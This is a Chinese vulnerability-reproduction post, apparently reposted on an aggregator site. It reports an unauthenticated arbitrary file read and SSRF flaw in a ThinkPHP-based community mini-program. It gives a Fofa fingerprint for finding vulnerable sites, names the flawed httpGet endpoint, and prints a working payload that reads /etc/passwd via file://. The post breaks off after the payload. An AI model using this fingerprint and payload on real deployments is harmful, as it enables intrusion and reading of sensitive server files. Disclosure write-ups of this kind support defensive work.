当前位置: 首页 > news >正文

【漏洞复现】某客圈子社区小程序审计(0day)

news 2025/7/7 19:36:55

0x00 前言

█ 纸上得来终觉浅,绝知此事要躬行 █

Fofa:"/static/index/js/jweixin-1.2.0.js"

在这里插入图片描述
该程序使用ThinkPHP 6.0.12作为框架,所以直接审计控制器即可.其Thinkphp版本较高,SQL注入不太可能,所以直接寻找其他洞.

0x01 前台任意文件读取+SSRF

在 /app/api/controller/Login.php 控制器中,httpGet方法存在curl_exec函数,且传参可控,导致任意文件读取+SSRF漏洞,非常经典的洞.

在这里插入图片描述
Linux Payload:

/index.php/api/login/httpGet?url=file:///etc/passwd
</
http://www.lryc.cn/news/431884.html

相关文章:

  • 信息安全数学基础(1)整除的概念
  • SearchGPT与谷歌:早期分析及用户反馈
  • VUE饿了么UPload组件自定义上传
  • 2.1概率统计的世界
  • SpringBoot使用QQ邮箱发送邮件
  • 使用 OpenCV 和 NumPy 进行图像处理:HSV 范围筛选实现PS抠图效果
  • IIS中间件
  • BMP280气压传感器详解(STM32)
  • DWPD指标:为何不再适用于大容量SSD?
  • 路由器的固定ip地址是啥意思?固定ip地址有什么好处
  • Java——踩坑Arrays.asList()
  • 前缀列表(ip-prefix)配置
  • 每日OJ_牛客_电话号码(简单哈希模拟)
  • 鸿蒙轻内核M核源码分析系列十二 事件Event
  • 基于 RocketMQ 的云原生 MQTT 消息引擎设计
  • AWVS/Acunetix Premium V24.8
  • [数据集][目标检测]灭火器检测数据集VOC+YOLO格式3255张1类别
  • 【技术警报】Redis故障启示录:当主节点宕机,如何避免数据“雪崩”?
  • 【基础】Three.js加载纹理贴图、加载外部gltf格式文件
  • 【区块链 + 人才服务】FISCO BCOS 区块链实训和管理平台 | FISCO BCOS应用案例
  • 联众优车持续加大汽车金融服务投入与创新,赋能汽车消费新生态
  • 基于yolov8的西红柿检测系统python源码+onnx模型+评估指标曲线+精美GUI界面
  • PHP轻量级高性能HTTP服务框架 - webman
  • Python实现人工鱼群算法
  • 【网络安全】密码学概述
  • Java连接SSH
  • 怎么取消MAC 输入首字母总是自动变大写
  • 【无损检测】基于用深度学习的工业超声B-Scan 图像中的焊缝缺陷
  • iOS——GCD再学习
  • SVD降维